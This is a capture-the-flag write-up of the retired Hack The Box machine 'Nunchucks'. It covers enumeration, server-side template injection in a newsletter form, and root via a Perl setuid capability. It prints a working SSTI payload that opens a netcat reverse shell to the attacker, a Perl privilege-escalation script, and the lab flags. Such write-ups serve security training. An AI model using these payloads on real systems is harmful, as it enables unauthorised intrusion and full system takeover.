Security Blog, Rants, Raves, Write-ups, and Code
Security Blog, Rants, Raves, Write-ups, and Code
Nunchucks
| Name: | Nunchucks 
|
|---|---|
| Release Date: | 28 Oct 2021 |
| Retire Date: | 02 Nov 2021 |
| OS: | Linux |
| Base Points: | Easy - Retired [0] |
| Rated Difficulty: |  |
| Radar Graph: |  |
 |
HTB-Bot  00 days, 02 hours, 00 mins, 00 seconds |
 |
HTB-Bot 00 days, 02 hours, 00 mins, 00 seconds |
| Creator: | TheCyberGeek  |
| Pentest Workshop PDF: | Nunchucks.pdf |
Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.11.122
Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.
We have ports SSH TCP 22, HTTP TCP 80, and HTTPS TCP 443 to deal with. Navigating to http://10.10.11.122 is "Unable to Connect". Navigating to https://10.10.11.122 pulls up a sales page. Looking at the autorecon output for TCP 80, we see that there's a statement "Did not follow the redirect to http://nunchucks.htb. This means we need to add it to /etc/hosts using:
vi /etc/hosts
10.10.11.122 nunchucks.htb
<ESC>:wq!<RETURN>
Notice, the domain name redirects to HTTPS and shows us the exact same page. Fire up GoBuster and check a look at results:
gobuster vhost -u https://nunchucks.htb -k -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t50 -o nunchucks.out
┌──(kali㉿kali)-[~/Desktop/HTB/Nunchucks]
└─$ gobuster vhost -u https://nunchucks.htb -k -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t50 -o nunchucks.out
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://nunchucks.htb
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/22 02:36:56 Starting gobuster in VHOST enumeration mode
===============================================================
Found: store.nunchucks.htb (Status: 200) [Size: 4029]
Found: Store.nunchucks.htb (Status: 200) [Size: 4029]
===============================================================
2022/01/22 03:21:09 Finished
===============================================================
Notice that we used "vhost" instead of "dir" in the Gobuster command. Dir will find directories, vhost finds sub-domains. We found the "store".nunchucks.htb sub-domain. We will need to add the sub-domain to our /etc/hosts file the same way we did above for nunchucks.htb.
There's no store yet, but a method to sign up for a newsletter. Depending on input validation on this site (and a myriad of other things), we can try different Web App Attack methods. One of those methods is an Server-Side Template Injection (SSTI) attack. To check for this type of attack, we need to input something that uses 7 * 7 = 49 in it. For more SSTI detection methods, check out HackTricks here. Our email address to enter should be {{7*7}}@nunchicks.htb and then capture the response in Burpsuite to confirm the SSTI. In this particular case, we don't "need" to use Burpsuite because the response shows the email address on the page itself to be 49@nunchucks.htb, but it's good practice to use Burp in case the address doesn't show on the response page.
Since we did get the "49" response, we have confirmed that the site is vulnerable to SSTI attacks. As simple Google search for Nunchucks Template Injection provides us with a "payload" to escape the sandboxing by using "range.constructor". With that, we can build an injection to make a reverse shell to out netcat listener:
On Attacking Machine:
nc -lvnp 1337
Send the POST to /api/submit to Repeater:
{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR TUN0 IP> 1337 >/tmp/f')\")()}}
We have a foothold as david. We can upgrade our shell to TTY using:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Grab the user.txt flag and begin our privesc enumeration (LinPEAS and/or LinEnum).
david@nunchucks:~$ cat user.txt
cat user.txt
891029b0bd7f13f2731b075bdaabf354
LinEnum shows POSIX/SETUID capabilities on /usr/bin/perl. This is another GTFOBins box. I love GTFOBins. They are so fun to play with.
All we need to do is create a simple Perl script that bypasses AppArmor (annoying thing that it is) and we should have a shell as root.
#!/usr/bin/perl
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/bash";
I like to create the script on my Attacking box and wget'ting it to the Victim machine. Vim tends to work very weird on reverse shells.
root@nunchucks:~# cat /root/root.txt
cat /root/root.txt
165be6ba57e60d1450789a97d473bf15
With that, we are root! Grab the flag and we've completed another box! Congrats!
©2020 Phoenix Computing Solutions | Powered by Coffee, Sarcasm, and Insanity
Everything included in the site is the intellectual property of Chris Ruggieri (Neocount Phoenix) and Phoenix Computing Solutions.
This information should not be construed as legal advice. The owner can not be held liable for anything another entity does with this information.
This information is solely the opinions and experiences of myself (Chris Ruggieri) and should not be construed as endorsement of any product, service, or of illegal activity
(GET WRITTEN PERMISSION PEOPLE!!)
Any links I provide as a convenience and for informational purposes only; they do not constitute an endorsement or an approval by the owner of this site for any of the products, services or opinions of the corporation or organization or individual.
Contact the external sites for answers to questions regarding its content.
This Includes any links posted by Chris Ruggieri in any other websites, Social Media networks, Online Groups and Online sharing Websites.